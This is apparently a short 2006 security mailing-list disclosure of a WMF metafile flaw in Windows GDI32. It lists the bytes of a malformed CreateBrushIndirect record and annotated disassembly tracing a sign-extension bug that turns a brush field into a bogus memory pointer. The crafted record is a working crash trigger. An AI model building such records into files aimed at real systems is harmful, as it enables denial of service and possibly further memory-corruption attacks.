There is some technical details.
1. 'Bad' wmf record:
07 00 00 00
length of record (in words)
FC 02
type (CreateBrushIndirect)
08 00 00 00 00 00 00 80
'packed' (good old Win16 days) LOGBRUSH data:
08 00 - 'packed' lbStyle (may be BS_DIBPATTERNPT [6] or BS_DIBPATTERN8X8 [8])
00 00 00 00 - COLORREF (any)
00 80 - 'packed' lbHatch (any, signed)
2. Sign extension bug:
GDI32!_CommonEnumMetaFile:
......
; normalize 'packed' LOGBRUSH
movzx eax, word ptr [ebx+6] ; lbStyle (UINT32(UINT16))
mov [ebp-0f8], eax
mov eax, [ebx + 8] ; COLORREF (as is)
mov [ebp-0f4], eax
movsx eax, word ptr [ebx+0c] ; <-- BUGBUG: lbHatch (UINT32(INT16))
lea eax, [ebp-0f8]
push eax
call GDI32!_CreateBrushIndirect
......
3. Memory access to fake 'pointer to packed DIB' (lbHatch) bug:
GDI32!_CreateBrushIndirect:
......
......
......
cmp edi, 6 ; BS_DIBPATTERNPT == lbStyle
jz _go2crush
......
cmp edi, 8 ; BS_DIBPATTERN8X8 == lbStyle
jz _go2crush
......
_go2crush:
push esi
push 1
push eax, [ebp+10]
push eax
push dword ptr [ebp+0c] ; 1
push dword ptr [ebp+18] ; lbHatch (fake *packedDIB)
call GDI32!_pbmiConvertInfo
......
......
GDI32!_pbmiConvertInfo:
......
push ebx
mov ebx, [ebp+8] ; lbHatch (fake *packedDIB)
......
mov eax, [ebx] ; <-- BUGBUG: crush or random (in first 0x7f00 bytes)
; memory access (see @ 0x3000 region)
regards,
cyanid-E
Received on Aug 07 2006
Intro
